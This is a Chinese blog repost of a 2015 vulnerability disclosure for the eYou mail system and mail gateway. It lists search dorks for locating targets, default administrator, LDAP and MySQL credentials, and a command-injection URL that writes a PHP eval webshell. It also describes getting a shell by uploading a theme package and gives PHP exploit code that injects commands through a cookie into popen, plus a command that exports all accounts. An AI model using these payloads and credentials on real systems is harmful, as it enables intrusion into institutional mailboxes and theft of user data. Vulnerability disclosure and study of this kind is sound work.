?

Jul 11 2015

【國內數千機構郵箱的淪陷】eYou郵箱系統系列產品若干個漏洞

首頁 » 漏洞收集 » 【國內數千機構郵箱的淪陷】eYou郵箱系統系列產品若干個漏洞   

簡要描述:

eYou是目前國內機構(高校、政府、企業)使用率最高的郵箱系統之一。
今發現eYou郵件系統、eYou郵件網關系統有多處嚴重的安全隱患,攻擊者可入侵服務器和盜取任意郵箱信息。
影響版本:2007年以后所有版本,包括最新版。

詳細說明:

** 查找目標

google搜索以下關鍵詞尋找使用eyou的目標

> intitle:億郵通訊

> inurl:mail intext:蔚藍天空

或者只是搜索inurl:gw或者inurl:gate.等都可以搜索到。

嗯,搜索inurl:mail site:edu.cn和inurl:mail site:gov.cn也可以找到目標。。。

部分網站修改了默認的模版,不過只要看http://www.target.com/admin/還是可以很輕松判斷是不是eYou。

使用舊版的站比較多,絕對比例有95%以上。



** 1.默認配置漏洞

這里的情況舊版新版都存在。首先默認的網關系統是跟郵件系統在一個機器上的,訪問8080端口即可。

> http://www.target.com/admin/

> 默認賬戶 admin aaaaa,部分站點還有eyoutest之類的賬戶,不知道是不是eyou的工作人員測試的時候留下忘記刪除的賬戶,同樣密碼為aaaaa

登錄后直接導出所有用戶。。。

> 默認LDAP信息:eyouadmin aaaaa

> 默認MySQL信息: root 密碼空

> 網關后臺http://www.target.com:8080/admin/或http://www.target.com:8080/gw/admin/

> 有三個默認賬戶,分別為

> admin:+-ccccc

> eyougw:[email protected](eyou)

> eyouuser:eyou_admin

網關處的管理員是存放在mysql中,可是eYou產品在安裝過程中沒有任何提示要求更改此處密碼,算是官方留的后門嗎?



查看投遞日志可以查看敏感信息。

1.jpg

2.jpg

** 2.舊版網關漏洞

網關系統這里問題挺嚴重的喔,只要能訪問到網關,只要在網關處能查看到隊列什么的,就能執行命令

利用URL:

> php/mailaction1.php?action=x&index=738952509.37684;echo '<?php eval($_REQUEST[cmd]) ?>'>/opt/apache/htdocs/t1.php

> php/mailaction1.php?action=x&index=738952509.37684;ls>t1.php

index參數沒過濾,直接帶入執行了。

舊版網關很多處地方有類似問題的,認真看下代碼就發現了。

入侵者得到webshell之后,直接使用/var/eyou/sbin/userdb_extract domain就能導出該域下所有用戶的賬戶信息!

這里的影響版本貌似是3.6-4.0

3.jpg


** 3.新版網關漏洞

新版網關比舊版的要安全多了。。。不過它之所以安全多了,是因為把代碼寫復雜了。。。把要研究的人都給繞暈了。。。

順便吐槽下這個新舊版本代碼變化也太大了把。。。

用前面發現的賬戶登錄網關后臺。我抓了一大堆網址,然后自己寫腳本來模擬登錄,20+個站點沒有一個修改了該處的密碼。。。所以這里新版后臺登錄的成功率是很高的。



新版本的網關,對用戶默認輸入的參數都進行了過濾,過濾了<、>什么的,然后注射啊命令執行什么的暫時還木有發現。

不過在管理配置那里的風格管理,對上傳的風格包,系統沒有任何判斷就直接覆蓋到gw/css/目錄去了。

然后入侵者就簡單了,用上面的后門賬戶登錄網關后臺,下載默認的風格包,解壓后加入php文件,然后上傳覆蓋。。。ok,getshell成功,然后就沒然后了。

影響版本為網關4.0以后的版本

4.jpg

** 4.郵箱系統遠程執行漏洞

前面三個項目都或多或少都有條件限制,不夠勁爆,再來個勁爆的,只要郵箱對外訪問,就能直接getshell。

問題在http://www.target.com/grad/admin/domain_logo.php這里,這個文件直接讀取Cookie("cookie"),然后就帶入popen了,沒任何過濾,多好啊。

exp可以參考下面的代碼來寫,很簡單很弱智的漏洞

code 區域

public function action_test()

	{

		$domain = $_GET['domain'];

		$url = "http://$domain/grad/admin/domain_logo.php";

		$cmd = "ls>test.txt";

		$req = Request::factory($url)

			->cookie('cookie', "/php/lib/;$cmd")

			//->send_headers()

			->execute();

		echo $domain;

		echo '<br />';

		echo $cmd;

		//echo '<br />';

		//$remote_url = "http://$domain/grad/admin/test.txt";

		//$rs = file_get_contents($remote_url);

		//echo $rs ? 'Has bug!' : 'No bug!';

		//$req2 = Request::factory($url)

		//	->cookie('cookie', "/php/lib/;rm test.txt")

			//->send_headers()

		//	->execute();

		exit;

	}



利用上面幾個漏洞,只要是使用eYou的郵箱系統,就99%會被入侵。看客請自重。

寫得不好,看懂怎么回事就行了、、、

漏洞證明:

親測吧,各位。

前段時間已經發了細節給廠商。

話說億郵你能不能重視一下下,都是用戶數據啊。。。

修復方案:

更新到最新版本。

或者干脆點,換其他的郵箱系統吧,CoreMail、AnyMacro等等都可以。。。

版權聲明:轉載請注明來源 YwiSax@烏云


正文部分到此結束

文章標簽: eyou漏洞 eyou

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «PHPCMS V9 一個為所欲為的漏洞 | Github上敏感信息泄露 眾多廠商躺槍»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖